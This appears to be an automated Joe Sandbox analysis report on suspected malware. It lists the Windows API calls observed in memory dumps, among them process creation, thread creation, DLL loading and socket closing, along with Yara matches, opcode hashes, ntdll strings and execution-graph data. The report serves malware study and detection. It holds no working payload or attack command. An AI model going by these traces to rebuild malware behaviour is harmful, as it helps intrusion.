                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02564112
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 447cf977fdca10ac1a33876b4063b1fb36cd6eb805c5acb8e85668d9b42e6eff
                                                            • Instruction ID: 901d32430cfffdcc5c9dc0996198acea571dd12a03c159c36f3010c8b011001e
                                                            • Opcode Fuzzy Hash: 447cf977fdca10ac1a33876b4063b1fb36cd6eb805c5acb8e85668d9b42e6eff
                                                            • Instruction Fuzzy Hash: E4110C3B0096845BC722DBB998442F9BFA0FFC2710B50018BC8C1AB562CB329485CA85
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02564112
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: c4f1b7a0c2deee32b11db9dcdb1a94a2edac2addc0fb21761626480dafadee5a
                                                            • Instruction ID: d3566d0f7b0edb339eee1ef39077f1c81ea991a7b311edc076ecbbb2bd0f25ba
                                                            • Opcode Fuzzy Hash: c4f1b7a0c2deee32b11db9dcdb1a94a2edac2addc0fb21761626480dafadee5a
                                                            • Instruction Fuzzy Hash: DC011EB9D4020EBBDB10EBA4EC45FADB7B9AB54308F008195E9089B241F631EB54CB95
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,02567993,00000010,?,?,?,00000044,?,00000010,02567993,?,?,?), ref: 02578023
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: d5978d441bdf714258c55e79d7431949182b83d02229c66b29665a6c5ffabf93
                                                            • Instruction ID: f20192dce5acbf3858907cfcd6ca1de8c2528e3e31ba5ca95c3a8be675b1ecbe
                                                            • Opcode Fuzzy Hash: d5978d441bdf714258c55e79d7431949182b83d02229c66b29665a6c5ffabf93
                                                            • Instruction Fuzzy Hash: D001C4B2215509BFCB44DE89DC90EDB77ADAF8C754F008108FA09D3241D630F8518BA8
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02559465
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 4960b20eab2b1e01f7624305e1e4f75fa6e2da1af4118cb1547a7bbc82f425de
                                                            • Instruction ID: c675465d708fdfbd0138487eb004a02333b7707da68ed4b9dde13fadb21148ee
                                                            • Opcode Fuzzy Hash: 4960b20eab2b1e01f7624305e1e4f75fa6e2da1af4118cb1547a7bbc82f425de
                                                            • Instruction Fuzzy Hash: DAF0657338121476E32065A9EC02FEB778DABC0765F144016FB0DDB1C0D595F84186E8
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02559465
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 451d9bee397fbdfc728321a04e5799378be1b504500ecc7cfb2b8bc1e6056ab5
                                                            • Instruction ID: 489f2ce425b3e163fb421166894410645f1eb85635da9a5f4ae40938dfb2479f
                                                            • Opcode Fuzzy Hash: 451d9bee397fbdfc728321a04e5799378be1b504500ecc7cfb2b8bc1e6056ab5
                                                            • Instruction Fuzzy Hash: BAE0927328031472E23062A9DC02FEB769DABC1B64F144019FB0DAB1C0D995B84186EC
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(02561319,?,025748DF,02561319,025742B7,025748DF,?,02561319,025742B7,00001000,?,?,02579760), ref: 02577F1F
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                                            • Instruction ID: 926507ee2b32b2474be41588326d12e1c1c76f56f2c7e933f08fb7388c380744
                                                            • Opcode Fuzzy Hash: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                                            • Instruction Fuzzy Hash: E6E06D72201609BFDA10EE59DC44F9B3BADEFC9714F008009FD08A7240D630BC108BB9
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E283010E,00000007,00000000,00000004,00000000,02563989,000000F4,?,?,?,?,?), ref: 02577F6F
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 301f91a0926ea47cd6ac96144deb57becc561bcbbb4fd9ca55dd87dbd17baae1
                                                            • Instruction ID: e5b75809284a15b59e9a374114dc0897f20c71db5271cfed6c1b9cc2765717f0
                                                            • Opcode Fuzzy Hash: 301f91a0926ea47cd6ac96144deb57becc561bcbbb4fd9ca55dd87dbd17baae1
                                                            • Instruction Fuzzy Hash: 55E065B2201705BBDA14EE58EC45FAB7BADEFC9750F008409FD08A7241C7B0B9108BB9
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 025679FC
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: cf231f8677e33c958fa969a7d586334994854ba62b57a385a59d6b6e2a2d6b77
                                                            • Instruction ID: af6528adeffb0b8db33e835cf32a6b89bdd8e7f11570942544b56b78feed4c99
                                                            • Opcode Fuzzy Hash: cf231f8677e33c958fa969a7d586334994854ba62b57a385a59d6b6e2a2d6b77
                                                            • Instruction Fuzzy Hash: EFE0867125420827FB24BAA8DC49F763758DB8C76CF284A60F91CDB2C1E679F6419258
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02561600,025769D7,025742B7,?), ref: 02567813
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: be3b83389bf5683a0d351d48e87ad6cf3298daa2bf31b01b13a49c78ede9408f
                                                            • Instruction ID: a672ad8bc23d2565704e46c7628c30f86d10e0ffa28b7e72b2e590e34608389d
                                                            • Opcode Fuzzy Hash: be3b83389bf5683a0d351d48e87ad6cf3298daa2bf31b01b13a49c78ede9408f
                                                            • Instruction Fuzzy Hash: F4E0C2732903026BF350F7A4DC06F3A7AC9EB88728F008568B95CE62C3EA24E4048618
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02561600,025769D7,025742B7,?), ref: 02567813
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: e44b9499f620dd947d475186ecba58997f3d27f3162ddc882693944072385c42
                                                            • Instruction ID: 63302c157d1ff0fe103d4adff1504a32d478a1f2fcfb1a725db98595066017a4
                                                            • Opcode Fuzzy Hash: e44b9499f620dd947d475186ecba58997f3d27f3162ddc882693944072385c42
                                                            • Instruction Fuzzy Hash: 0ED05E722903067BF640E6E4DC06F2A36CDEB48B58F048064BA0CEB2C2E955F440466D
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5ee08decdefa347cbea52a3358a1d89272ba2efaf5a2f28d132db80dcfe2ce6c
                                                            • Instruction ID: 41f314fb773ae8a090bf0bddadd86e51a4fdccf62d732d1cf0224bb2a6011989
                                                            • Opcode Fuzzy Hash: 5ee08decdefa347cbea52a3358a1d89272ba2efaf5a2f28d132db80dcfe2ce6c
                                                            • Instruction Fuzzy Hash: 8DB09B71D415D5D5DF11E7604A08717791067D1791F15C061E3034641E473CC1D5F175
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b0cfcff590ac2421b3918c88b90bf0b9f2d66e3754d2322ce77c530e36680cc
                                                            • Instruction ID: 23532348fdb1c42f331351c1ebe5a28de399dff3eca8d6c1b2d6f8f6e6e4e3c3
                                                            • Opcode Fuzzy Hash: 2b0cfcff590ac2421b3918c88b90bf0b9f2d66e3754d2322ce77c530e36680cc
                                                            • Instruction Fuzzy Hash: 94C01221A2444907C1246C4EE8843B0F391D397168E8462DBD80AE7244C017D444025C
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: af8268729a8817cc7a7d4baf012c22f6e24362686484ef585a380f62c7c72a2a
                                                            • Instruction ID: 9292af80e37fc908e856e3d052d9095bc4fd3821c542b8f9f1b4ef9a226c9cb2
                                                            • Opcode Fuzzy Hash: af8268729a8817cc7a7d4baf012c22f6e24362686484ef585a380f62c7c72a2a
                                                            • Instruction Fuzzy Hash: 42510BB6F001267FDB21DF98889097EF7B8BB09380B54C26AEA55D7641D734DE14CBA0
                                                            Strings
                                                            • ExecuteOptions, xrefs: 02F546A0
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F54725
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F54655
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F54787
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F546FC
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F54742
                                                            • Execute=1, xrefs: 02F54713
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 826cdec6d5556de37d702f9a71da22e8a00b5e5b48dc73d053d3d673a2f420d4
                                                            • Instruction ID: b9e4b1e9acb0d42f4ca724e780a7a9f972ec2c9d8e8f850e55b2bd9f467b3141
                                                            • Opcode Fuzzy Hash: 826cdec6d5556de37d702f9a71da22e8a00b5e5b48dc73d053d3d673a2f420d4
                                                            • Instruction Fuzzy Hash: D3511931A4021D6AEF10BFA4EC95FB9B7B9EF05384F540099E70AAB181E7719E45CF50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: 23e952d7460417aa06228f7ad618ad279b62bad511ce10b5c0d8a4009c157312
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: AD81E370E052698EDF24CF68C851BFEBBB2AF4739CF184259DE61A7291C7348849CB50
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F502BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F502E7
                                                            • RTL: Re-Waiting, xrefs: 02F5031E
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: b206bed528a0b4c4b261db7e7501ece436d07f7e8d94be4bb1bb1ba60785a82b
                                                            • Instruction ID: 1df4cdbff273edb15d8cd587c2fcdfb5500c4d2279815b670f8a3be5fdd52508
                                                            • Opcode Fuzzy Hash: b206bed528a0b4c4b261db7e7501ece436d07f7e8d94be4bb1bb1ba60785a82b
                                                            • Instruction Fuzzy Hash: 54E1BF31A087419FD725CF28C884B2AB7E1BB89394F140A5DFB958B6E1DB74E845CB42
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 02F57B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F57B7F
                                                            • RTL: Re-Waiting, xrefs: 02F57BAC
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: d1a2c7f948174bbadbd4950fcddbf6cb38882d5a68311e2a460c5022b6bd7441
                                                            • Instruction ID: fd68bb3c44299c05468de347b2879d7bc248d184da291c533bacb9e4678de79e
                                                            • Opcode Fuzzy Hash: d1a2c7f948174bbadbd4950fcddbf6cb38882d5a68311e2a460c5022b6bd7441
                                                            • Instruction Fuzzy Hash: 6341CF31B007029BD724DE25DD40B6AB7E6EF88794F500A1DFA5A9B680DB30E805CF91
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F5728C
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 02F572A3
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F57294
                                                            • RTL: Re-Waiting, xrefs: 02F572C1
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: d308b80c192f5f4e7107109251bf1c1ead81a6cf3e1a18d275c26b7fb617c882
                                                            • Instruction ID: 70d19e1e4df4a631d1ed9090b6624f8515a3d4cc28d9e91313ce792648d4a084
                                                            • Opcode Fuzzy Hash: d308b80c192f5f4e7107109251bf1c1ead81a6cf3e1a18d275c26b7fb617c882
                                                            • Instruction Fuzzy Hash: 8741EF32B00252ABD721DE25CD41B6AB7A6FB94794F104619FF55EB680DB21E806CFD0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: a36497dc6e37e6a71572b9616a9ed74bd635e8a27d2a1a3071a4b8c7d4d892b5
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 0E91E771E042369BDB24EE69C8917BEF7A1FF467E4F14451AEA11E72C0D7308948CB61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 08af6f29f43b8083eef532441da094a0fe04629dd42d99203b107b342c7610b0
                                                            • Instruction ID: 16fd2abc4243e9c6504e6b4ebf78f7561cb82be55c09d58d3689c71a76221ee8
                                                            • Opcode Fuzzy Hash: 08af6f29f43b8083eef532441da094a0fe04629dd42d99203b107b342c7610b0
                                                            • Instruction Fuzzy Hash: 7D811D71D402699BDB25DB54CC44BEEB7B5AF08754F0181EAEA1DB7280D7705E84CFA0
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 02F6CFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4Qw@4Qw
                                                            • API String ID: 4062629308-2383119779
                                                            • Opcode ID: da7258e2753c77946a8ddb01e781e5716afd774ace1b7ff5b4b4cb2ccdda16e5
                                                            • Instruction ID: 0cc1967925b407a150184acfb1e0d16f9e3f2519bb97e7067aa23271332d16a4
                                                            • Opcode Fuzzy Hash: da7258e2753c77946a8ddb01e781e5716afd774ace1b7ff5b4b4cb2ccdda16e5
                                                            • Instruction Fuzzy Hash: D641BC71E40218EFDB219FA4C944ABEBBBAEF45B80F04806AEB01DB254D774D800CF61

                                                            Execution Graph

                                                            Execution Coverage:2.3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:3
                                                            Total number of Limit Nodes:0
                                                            execution_graph 13513 23cad7a 13514 23cad97 13513->13514 13515 23cada6 closesocket 13514->13515

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 23cad7a-23cadb4 call 23a3f6a call 23cb7da closesocket
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_23a0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID:
                                                            • API String ID: 2781271927-0
                                                            • Opcode ID: 20948c9f75778b65bf7842f237703ff10c6d956e440d6e2c913dcd2097a7825b
                                                            • Instruction ID: 01a7dd8746719670f83358fac55752f445d2b70870c59ed6267b991c53978800
                                                            • Opcode Fuzzy Hash: 20948c9f75778b65bf7842f237703ff10c6d956e440d6e2c913dcd2097a7825b
                                                            • Instruction Fuzzy Hash: E1E0C2362403047BC620EB6ACC44CDBB36EEFC5B60B008029FE08A7201C735BA128BF0